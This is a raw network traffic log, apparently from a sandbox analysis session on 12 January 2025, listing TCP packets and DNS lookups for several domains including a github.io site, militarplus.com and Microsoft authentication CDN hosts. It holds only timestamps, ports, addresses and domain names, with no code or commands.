                                                        Jan 12, 2025 01:25:08.683881044 CET49811443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:08.684324026 CET4434981172.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:08.684345007 CET4434981172.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:08.684420109 CET49811443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:08.684835911 CET4434981172.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:08.684921026 CET49811443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:08.685739994 CET4434981172.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:08.685813904 CET49811443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:08.776206970 CET4434981172.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:08.776319981 CET49811443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:08.776386023 CET4434981172.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:08.776457071 CET49811443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:08.777049065 CET4434981172.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:08.777132034 CET49811443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:08.777842999 CET4434981172.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:08.777929068 CET49811443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:08.778392076 CET4434981172.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:08.778460026 CET49811443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:08.779369116 CET4434981172.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:08.779412031 CET4434981172.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:08.779438972 CET49811443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:08.779469013 CET4434981172.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:08.779500008 CET49811443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:08.779529095 CET49811443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:08.780173063 CET4434981172.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:08.780237913 CET49811443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:08.780251980 CET4434981172.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:08.780277014 CET4434981172.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:08.780313969 CET49811443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:08.780339956 CET49811443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:08.780426979 CET49811443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:08.780464888 CET4434981172.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:08.780488014 CET49811443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:08.780524015 CET49811443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:08.969327927 CET4434982472.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:08.969650030 CET49824443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:08.969669104 CET4434982472.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:08.970163107 CET4434982472.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:08.970552921 CET49824443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:08.970630884 CET4434982472.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:08.970824957 CET49824443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:09.011328936 CET4434982472.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:09.012810946 CET4434981518.245.31.78192.168.2.6
                                                        Jan 12, 2025 01:25:09.012978077 CET49815443192.168.2.618.245.31.78
                                                        Jan 12, 2025 01:25:09.013009071 CET4434981518.245.31.78192.168.2.6
                                                        Jan 12, 2025 01:25:09.013981104 CET4434981518.245.31.78192.168.2.6
                                                        Jan 12, 2025 01:25:09.014043093 CET49815443192.168.2.618.245.31.78
                                                        Jan 12, 2025 01:25:09.014297962 CET49815443192.168.2.618.245.31.78
                                                        Jan 12, 2025 01:25:09.014344931 CET4434981518.245.31.78192.168.2.6
                                                        Jan 12, 2025 01:25:09.014429092 CET49815443192.168.2.618.245.31.78
                                                        Jan 12, 2025 01:25:09.014437914 CET4434981518.245.31.78192.168.2.6
                                                        Jan 12, 2025 01:25:09.064841986 CET49815443192.168.2.618.245.31.78
                                                        Jan 12, 2025 01:25:09.140119076 CET44349816192.229.133.221192.168.2.6
                                                        Jan 12, 2025 01:25:09.140465021 CET49816443192.168.2.6192.229.133.221
                                                        Jan 12, 2025 01:25:09.140481949 CET44349816192.229.133.221192.168.2.6
                                                        Jan 12, 2025 01:25:09.141544104 CET44349816192.229.133.221192.168.2.6
                                                        Jan 12, 2025 01:25:09.141633034 CET49816443192.168.2.6192.229.133.221
                                                        Jan 12, 2025 01:25:09.142621994 CET49816443192.168.2.6192.229.133.221
                                                        Jan 12, 2025 01:25:09.142693043 CET44349816192.229.133.221192.168.2.6
                                                        Jan 12, 2025 01:25:09.142775059 CET49816443192.168.2.6192.229.133.221
                                                        Jan 12, 2025 01:25:09.142790079 CET44349816192.229.133.221192.168.2.6
                                                        Jan 12, 2025 01:25:09.183419943 CET44349823152.199.21.175192.168.2.6
                                                        Jan 12, 2025 01:25:09.183630943 CET49823443192.168.2.6152.199.21.175
                                                        Jan 12, 2025 01:25:09.183640003 CET44349823152.199.21.175192.168.2.6
                                                        Jan 12, 2025 01:25:09.185137033 CET44349823152.199.21.175192.168.2.6
                                                        Jan 12, 2025 01:25:09.185213089 CET49823443192.168.2.6152.199.21.175
                                                        Jan 12, 2025 01:25:09.186233997 CET49823443192.168.2.6152.199.21.175
                                                        Jan 12, 2025 01:25:09.186321974 CET44349823152.199.21.175192.168.2.6
                                                        Jan 12, 2025 01:25:09.186429024 CET49823443192.168.2.6152.199.21.175
                                                        Jan 12, 2025 01:25:09.186436892 CET44349823152.199.21.175192.168.2.6
                                                        Jan 12, 2025 01:25:09.188225031 CET49816443192.168.2.6192.229.133.221
                                                        Jan 12, 2025 01:25:09.234793901 CET49823443192.168.2.6152.199.21.175
                                                        Jan 12, 2025 01:25:09.282999039 CET4434981518.245.31.78192.168.2.6
                                                        Jan 12, 2025 01:25:09.292922974 CET4434981518.245.31.78192.168.2.6
                                                        Jan 12, 2025 01:25:09.292933941 CET4434981518.245.31.78192.168.2.6
                                                        Jan 12, 2025 01:25:09.292948961 CET4434981518.245.31.78192.168.2.6
                                                        Jan 12, 2025 01:25:09.293020010 CET49815443192.168.2.618.245.31.78
                                                        Jan 12, 2025 01:25:09.293037891 CET4434981518.245.31.78192.168.2.6
                                                        Jan 12, 2025 01:25:09.293096066 CET49815443192.168.2.618.245.31.78
                                                        Jan 12, 2025 01:25:09.372008085 CET4434981518.245.31.78192.168.2.6
                                                        Jan 12, 2025 01:25:09.372030973 CET4434981518.245.31.78192.168.2.6
                                                        Jan 12, 2025 01:25:09.372133970 CET49815443192.168.2.618.245.31.78
                                                        Jan 12, 2025 01:25:09.372147083 CET4434981518.245.31.78192.168.2.6
                                                        Jan 12, 2025 01:25:09.372196913 CET49815443192.168.2.618.245.31.78
                                                        Jan 12, 2025 01:25:09.379519939 CET4434981518.245.31.78192.168.2.6
                                                        Jan 12, 2025 01:25:09.379554987 CET4434981518.245.31.78192.168.2.6
                                                        Jan 12, 2025 01:25:09.379592896 CET49815443192.168.2.618.245.31.78
                                                        Jan 12, 2025 01:25:09.379601002 CET4434981518.245.31.78192.168.2.6
                                                        Jan 12, 2025 01:25:09.379622936 CET4434981518.245.31.78192.168.2.6
                                                        Jan 12, 2025 01:25:09.379633904 CET49815443192.168.2.618.245.31.78
                                                        Jan 12, 2025 01:25:09.379673004 CET49815443192.168.2.618.245.31.78
                                                        Jan 12, 2025 01:25:09.379904985 CET49815443192.168.2.618.245.31.78
                                                        Jan 12, 2025 01:25:09.379925013 CET4434981518.245.31.78192.168.2.6
                                                        Jan 12, 2025 01:25:09.391990900 CET44349816192.229.133.221192.168.2.6
                                                        Jan 12, 2025 01:25:09.396437883 CET44349816192.229.133.221192.168.2.6
                                                        Jan 12, 2025 01:25:09.396461964 CET44349816192.229.133.221192.168.2.6
                                                        Jan 12, 2025 01:25:09.396506071 CET44349816192.229.133.221192.168.2.6
                                                        Jan 12, 2025 01:25:09.396533966 CET49816443192.168.2.6192.229.133.221
                                                        Jan 12, 2025 01:25:09.396565914 CET44349816192.229.133.221192.168.2.6
                                                        Jan 12, 2025 01:25:09.396586895 CET49816443192.168.2.6192.229.133.221
                                                        Jan 12, 2025 01:25:09.396661997 CET49816443192.168.2.6192.229.133.221
                                                        Jan 12, 2025 01:25:09.441133976 CET44349823152.199.21.175192.168.2.6
                                                        Jan 12, 2025 01:25:09.441303015 CET44349823152.199.21.175192.168.2.6
                                                        Jan 12, 2025 01:25:09.441458941 CET49823443192.168.2.6152.199.21.175
                                                        Jan 12, 2025 01:25:09.441466093 CET44349823152.199.21.175192.168.2.6
                                                        Jan 12, 2025 01:25:09.441519022 CET49823443192.168.2.6152.199.21.175
                                                        Jan 12, 2025 01:25:09.457359076 CET49823443192.168.2.6152.199.21.175
                                                        Jan 12, 2025 01:25:09.457386017 CET44349823152.199.21.175192.168.2.6
                                                        Jan 12, 2025 01:25:09.470201015 CET49837443192.168.2.6152.199.21.175
                                                        Jan 12, 2025 01:25:09.470235109 CET44349837152.199.21.175192.168.2.6
                                                        Jan 12, 2025 01:25:09.470299006 CET49837443192.168.2.6152.199.21.175
                                                        Jan 12, 2025 01:25:09.470515966 CET49837443192.168.2.6152.199.21.175
                                                        Jan 12, 2025 01:25:09.470530033 CET44349837152.199.21.175192.168.2.6
                                                        Jan 12, 2025 01:25:09.483949900 CET44349816192.229.133.221192.168.2.6
                                                        Jan 12, 2025 01:25:09.484030008 CET44349816192.229.133.221192.168.2.6
                                                        Jan 12, 2025 01:25:09.484179974 CET49816443192.168.2.6192.229.133.221
                                                        Jan 12, 2025 01:25:09.484179974 CET49816443192.168.2.6192.229.133.221
                                                        Jan 12, 2025 01:25:09.484556913 CET49816443192.168.2.6192.229.133.221
                                                        Jan 12, 2025 01:25:09.484595060 CET44349816192.229.133.221192.168.2.6
                                                        Jan 12, 2025 01:25:09.583488941 CET4434982472.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:09.583740950 CET4434982472.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:09.583796978 CET49824443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:09.584055901 CET49824443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:09.584064007 CET4434982472.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:09.584108114 CET49824443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:09.584108114 CET49824443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:09.585222960 CET49839443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:09.585267067 CET4434983972.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:09.585330009 CET49839443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:09.585560083 CET49839443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:09.585577011 CET4434983972.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:10.168977022 CET4434983972.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:10.212879896 CET49839443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:10.219075918 CET49839443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:10.219085932 CET4434983972.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:10.219753981 CET4434983972.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:10.264131069 CET49839443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:10.269192934 CET49839443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:10.269412994 CET4434983972.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:10.269927025 CET49839443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:10.278136969 CET44349837152.199.21.175192.168.2.6
                                                        Jan 12, 2025 01:25:10.279216051 CET49837443192.168.2.6152.199.21.175
                                                        Jan 12, 2025 01:25:10.279227018 CET44349837152.199.21.175192.168.2.6
                                                        Jan 12, 2025 01:25:10.280210018 CET44349837152.199.21.175192.168.2.6
                                                        Jan 12, 2025 01:25:10.280277967 CET49837443192.168.2.6152.199.21.175
                                                        Jan 12, 2025 01:25:10.281088114 CET49837443192.168.2.6152.199.21.175
                                                        Jan 12, 2025 01:25:10.281136036 CET44349837152.199.21.175192.168.2.6
                                                        Jan 12, 2025 01:25:10.281373024 CET49837443192.168.2.6152.199.21.175
                                                        Jan 12, 2025 01:25:10.281380892 CET44349837152.199.21.175192.168.2.6
                                                        Jan 12, 2025 01:25:10.315320969 CET4434983972.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:10.330427885 CET49837443192.168.2.6152.199.21.175
                                                        Jan 12, 2025 01:25:10.435728073 CET4434983972.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:10.435784101 CET4434983972.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:10.435787916 CET4434983972.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:10.435811043 CET4434983972.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:10.435851097 CET49839443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:10.435914040 CET4434983972.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:10.435945988 CET49839443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:10.483496904 CET49839443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:10.523977995 CET4434983972.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:10.523989916 CET4434983972.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:10.524005890 CET4434983972.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:10.524039030 CET49839443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:10.524069071 CET4434983972.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:10.524079084 CET4434983972.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:10.524090052 CET49839443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:10.524112940 CET4434983972.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:10.524112940 CET49839443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:10.524123907 CET49839443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:10.524216890 CET4434983972.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:10.524270058 CET49839443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:10.544471025 CET44349837152.199.21.175192.168.2.6
                                                        Jan 12, 2025 01:25:10.544523001 CET44349837152.199.21.175192.168.2.6
                                                        Jan 12, 2025 01:25:10.544567108 CET49837443192.168.2.6152.199.21.175
                                                        Jan 12, 2025 01:25:10.544578075 CET44349837152.199.21.175192.168.2.6
                                                        Jan 12, 2025 01:25:10.544595003 CET44349837152.199.21.175192.168.2.6
                                                        Jan 12, 2025 01:25:10.544642925 CET49837443192.168.2.6152.199.21.175
                                                        Jan 12, 2025 01:25:10.547319889 CET49839443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:10.547334909 CET4434983972.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:10.692928076 CET49837443192.168.2.6152.199.21.175
                                                        Jan 12, 2025 01:25:10.692985058 CET44349837152.199.21.175192.168.2.6
                                                        Jan 12, 2025 01:25:10.720979929 CET49843443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:10.721049070 CET4434984372.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:10.721261978 CET49843443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:10.721395016 CET49843443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:10.721410036 CET4434984372.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:11.327764034 CET4434984372.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:11.328165054 CET49843443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:11.328193903 CET4434984372.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:11.329524040 CET4434984372.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:11.330007076 CET49843443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:11.330205917 CET4434984372.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:11.330394983 CET49843443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:11.375323057 CET4434984372.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:11.587939024 CET4434984372.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:11.588018894 CET4434984372.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:11.588092089 CET49843443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:11.588120937 CET4434984372.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:11.633085966 CET49843443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:11.678358078 CET4434984372.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:11.678395033 CET4434984372.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:11.678451061 CET49843443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:11.678487062 CET49843443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:11.678539038 CET4434984372.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:11.678606987 CET49843443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:11.678621054 CET4434984372.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:11.678666115 CET49843443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:11.678721905 CET4434984372.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:11.678776026 CET49843443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:11.679339886 CET49843443192.168.2.672.167.84.16
                                                        Jan 12, 2025 01:25:11.679357052 CET4434984372.167.84.16192.168.2.6
                                                        Jan 12, 2025 01:25:34.324398041 CET4970980192.168.2.6185.199.108.153
                                                        Jan 12, 2025 01:25:34.329370975 CET8049709185.199.108.153192.168.2.6
                                                        Jan 12, 2025 01:25:34.794701099 CET4970880192.168.2.6185.199.108.153
                                                        Jan 12, 2025 01:25:34.799592972 CET8049708185.199.108.153192.168.2.6
                                                        Jan 12, 2025 01:25:46.564264059 CET50015443192.168.2.6142.250.181.228
                                                        Jan 12, 2025 01:25:46.564358950 CET44350015142.250.181.228192.168.2.6
                                                        Jan 12, 2025 01:25:46.564449072 CET50015443192.168.2.6142.250.181.228
                                                        Jan 12, 2025 01:25:46.564657927 CET50015443192.168.2.6142.250.181.228
                                                        Jan 12, 2025 01:25:46.564688921 CET44350015142.250.181.228192.168.2.6
                                                        Jan 12, 2025 01:25:47.424206972 CET44350015142.250.181.228192.168.2.6
                                                        Jan 12, 2025 01:25:47.424659014 CET50015443192.168.2.6142.250.181.228
                                                        Jan 12, 2025 01:25:47.424714088 CET44350015142.250.181.228192.168.2.6
                                                        Jan 12, 2025 01:25:47.425338030 CET44350015142.250.181.228192.168.2.6
                                                        Jan 12, 2025 01:25:47.425725937 CET50015443192.168.2.6142.250.181.228
                                                        Jan 12, 2025 01:25:47.425821066 CET44350015142.250.181.228192.168.2.6
                                                        Jan 12, 2025 01:25:47.480618000 CET50015443192.168.2.6142.250.181.228
                                                        Jan 12, 2025 01:25:50.513031960 CET4970980192.168.2.6185.199.108.153
                                                        Jan 12, 2025 01:25:50.518048048 CET8049709185.199.108.153192.168.2.6
                                                        Jan 12, 2025 01:25:50.518129110 CET4970980192.168.2.6185.199.108.153
                                                        Jan 12, 2025 01:25:57.324949026 CET44350015142.250.181.228192.168.2.6
                                                        Jan 12, 2025 01:25:57.325035095 CET44350015142.250.181.228192.168.2.6
                                                        Jan 12, 2025 01:25:57.325112104 CET50015443192.168.2.6142.250.181.228
                                                        Jan 12, 2025 01:25:58.514939070 CET50015443192.168.2.6142.250.181.228
                                                        Jan 12, 2025 01:25:58.515007019 CET44350015142.250.181.228192.168.2.6
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jan 12, 2025 01:24:44.092679024 CET53531451.1.1.1192.168.2.6
                                                        Jan 12, 2025 01:24:44.190546036 CET53533921.1.1.1192.168.2.6
                                                        Jan 12, 2025 01:24:45.177536011 CET53644681.1.1.1192.168.2.6
                                                        Jan 12, 2025 01:24:46.512176991 CET5477053192.168.2.61.1.1.1
                                                        Jan 12, 2025 01:24:46.512339115 CET5189653192.168.2.61.1.1.1
                                                        Jan 12, 2025 01:24:46.518716097 CET53547701.1.1.1192.168.2.6
                                                        Jan 12, 2025 01:24:46.519043922 CET53518961.1.1.1192.168.2.6
                                                        Jan 12, 2025 01:24:49.297185898 CET5954553192.168.2.61.1.1.1
                                                        Jan 12, 2025 01:24:49.301438093 CET6029253192.168.2.61.1.1.1
                                                        Jan 12, 2025 01:24:49.306457996 CET53595451.1.1.1192.168.2.6
                                                        Jan 12, 2025 01:24:49.310837030 CET53602921.1.1.1192.168.2.6
                                                        Jan 12, 2025 01:24:49.804749012 CET5752253192.168.2.61.1.1.1
                                                        Jan 12, 2025 01:24:49.805197001 CET5329853192.168.2.61.1.1.1
                                                        Jan 12, 2025 01:24:49.813424110 CET53575221.1.1.1192.168.2.6
                                                        Jan 12, 2025 01:24:49.814230919 CET53532981.1.1.1192.168.2.6
                                                        Jan 12, 2025 01:24:50.678426027 CET53530191.1.1.1192.168.2.6
                                                        Jan 12, 2025 01:24:50.689498901 CET6347753192.168.2.61.1.1.1
                                                        Jan 12, 2025 01:24:50.689681053 CET5938553192.168.2.61.1.1.1
                                                        Jan 12, 2025 01:24:50.697751045 CET53593851.1.1.1192.168.2.6
                                                        Jan 12, 2025 01:24:50.698414087 CET53634771.1.1.1192.168.2.6
                                                        Jan 12, 2025 01:25:02.143986940 CET53580191.1.1.1192.168.2.6
                                                        Jan 12, 2025 01:25:06.163976908 CET5582153192.168.2.61.1.1.1
                                                        Jan 12, 2025 01:25:06.166100025 CET5427553192.168.2.61.1.1.1
                                                        Jan 12, 2025 01:25:06.176316023 CET53558211.1.1.1192.168.2.6
                                                        Jan 12, 2025 01:25:06.179275990 CET53542751.1.1.1192.168.2.6
                                                        Jan 12, 2025 01:25:07.125905037 CET4973153192.168.2.61.1.1.1
                                                        Jan 12, 2025 01:25:07.126147985 CET6330253192.168.2.61.1.1.1
                                                        Jan 12, 2025 01:25:07.133088112 CET53633021.1.1.1192.168.2.6
                                                        Jan 12, 2025 01:25:07.133353949 CET53497311.1.1.1192.168.2.6
                                                        Jan 12, 2025 01:25:07.691427946 CET5420753192.168.2.61.1.1.1
                                                        Jan 12, 2025 01:25:07.691495895 CET5586853192.168.2.61.1.1.1
                                                        Jan 12, 2025 01:25:07.699604988 CET53542071.1.1.1192.168.2.6
                                                        Jan 12, 2025 01:25:07.704169035 CET53558681.1.1.1192.168.2.6
                                                        Jan 12, 2025 01:25:08.286977053 CET5424553192.168.2.61.1.1.1
                                                        Jan 12, 2025 01:25:08.287396908 CET5687453192.168.2.61.1.1.1
                                                        Jan 12, 2025 01:25:08.294703007 CET53568741.1.1.1192.168.2.6
                                                        Jan 12, 2025 01:25:08.297559977 CET53542451.1.1.1192.168.2.6
                                                        Jan 12, 2025 01:25:08.300297976 CET6306253192.168.2.61.1.1.1
                                                        Jan 12, 2025 01:25:08.300462008 CET5181153192.168.2.61.1.1.1
                                                        Jan 12, 2025 01:25:08.309648991 CET53630621.1.1.1192.168.2.6
                                                        Jan 12, 2025 01:25:08.324898005 CET53518111.1.1.1192.168.2.6
                                                        Jan 12, 2025 01:25:08.347137928 CET6381553192.168.2.61.1.1.1
                                                        Jan 12, 2025 01:25:08.347268105 CET5589853192.168.2.61.1.1.1
                                                        Jan 12, 2025 01:25:08.354918957 CET53638151.1.1.1192.168.2.6
                                                        Jan 12, 2025 01:25:08.355447054 CET53558761.1.1.1192.168.2.6
                                                        Jan 12, 2025 01:25:08.364870071 CET53558981.1.1.1192.168.2.6
                                                        Jan 12, 2025 01:25:08.403944969 CET53598861.1.1.1192.168.2.6
                                                        Jan 12, 2025 01:25:09.281744957 CET53626031.1.1.1192.168.2.6
                                                        Jan 12, 2025 01:25:09.460952044 CET6331853192.168.2.61.1.1.1
                                                        Jan 12, 2025 01:25:09.461097002 CET5060053192.168.2.61.1.1.1
                                                        Jan 12, 2025 01:25:09.469373941 CET53633181.1.1.1192.168.2.6
                                                        Jan 12, 2025 01:25:09.469831944 CET53506001.1.1.1192.168.2.6
                                                        Jan 12, 2025 01:25:21.170450926 CET53510511.1.1.1192.168.2.6
                                                        Jan 12, 2025 01:25:43.714081049 CET53551851.1.1.1192.168.2.6
                                                        Jan 12, 2025 01:25:44.061685085 CET53610561.1.1.1192.168.2.6
                                                        TimestampSource IPDest IPChecksumCodeType
                                                        Jan 12, 2025 01:25:08.324978113 CET192.168.2.61.1.1.1c245(Port unreachable)Destination Unreachable
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Jan 12, 2025 01:24:46.512176991 CET192.168.2.61.1.1.10x9253Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:24:46.512339115 CET192.168.2.61.1.1.10x626cStandard query (0)www.google.com65IN (0x0001)false
                                                        Jan 12, 2025 01:24:49.297185898 CET192.168.2.61.1.1.10x6a13Standard query (0)procustodiavalueslive.github.ioA (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:24:49.301438093 CET192.168.2.61.1.1.10xb322Standard query (0)procustodiavalueslive.github.io65IN (0x0001)false
                                                        Jan 12, 2025 01:24:49.804749012 CET192.168.2.61.1.1.10x5cbeStandard query (0)procustodiavalueslive.github.ioA (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:24:49.805197001 CET192.168.2.61.1.1.10x39Standard query (0)procustodiavalueslive.github.io65IN (0x0001)false
                                                        Jan 12, 2025 01:24:50.689498901 CET192.168.2.61.1.1.10x9d16Standard query (0)procustodiavalueslive.github.ioA (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:24:50.689681053 CET192.168.2.61.1.1.10xddb8Standard query (0)procustodiavalueslive.github.io65IN (0x0001)false
                                                        Jan 12, 2025 01:25:06.163976908 CET192.168.2.61.1.1.10xb88cStandard query (0)militarplus.comA (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:25:06.166100025 CET192.168.2.61.1.1.10xdecdStandard query (0)militarplus.com65IN (0x0001)false
                                                        Jan 12, 2025 01:25:07.125905037 CET192.168.2.61.1.1.10xc101Standard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:25:07.126147985 CET192.168.2.61.1.1.10xfca0Standard query (0)cdn.socket.io65IN (0x0001)false
                                                        Jan 12, 2025 01:25:07.691427946 CET192.168.2.61.1.1.10xf3eeStandard query (0)militarplus.comA (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:25:07.691495895 CET192.168.2.61.1.1.10x6549Standard query (0)militarplus.com65IN (0x0001)false
                                                        Jan 12, 2025 01:25:08.286977053 CET192.168.2.61.1.1.10x320eStandard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:25:08.287396908 CET192.168.2.61.1.1.10x24b5Standard query (0)cdn.socket.io65IN (0x0001)false
                                                        Jan 12, 2025 01:25:08.300297976 CET192.168.2.61.1.1.10x1087Standard query (0)www.w3schools.comA (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:25:08.300462008 CET192.168.2.61.1.1.10x8d5dStandard query (0)www.w3schools.com65IN (0x0001)false
                                                        Jan 12, 2025 01:25:08.347137928 CET192.168.2.61.1.1.10x54aStandard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:25:08.347268105 CET192.168.2.61.1.1.10xb50Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                        Jan 12, 2025 01:25:09.460952044 CET192.168.2.61.1.1.10x6825Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:25:09.461097002 CET192.168.2.61.1.1.10xbd74Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Jan 12, 2025 01:24:46.518716097 CET1.1.1.1192.168.2.60x9253No error (0)www.google.com142.250.181.228A (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:24:46.519043922 CET1.1.1.1192.168.2.60x626cNo error (0)www.google.com65IN (0x0001)false
                                                        Jan 12, 2025 01:24:49.306457996 CET1.1.1.1192.168.2.60x6a13No error (0)procustodiavalueslive.github.io185.199.108.153A (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:24:49.306457996 CET1.1.1.1192.168.2.60x6a13No error (0)procustodiavalueslive.github.io185.199.109.153A (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:24:49.306457996 CET1.1.1.1192.168.2.60x6a13No error (0)procustodiavalueslive.github.io185.199.111.153A (IP address)IN (0x0001)false
                                                        Jan 12, 2025 01:24:49.306457996 CET1.1.1.1192.168.2.60x6a13No error (0)procustodiavalueslive.github.io185.199.110.153A (IP address)IN (0x0001)false
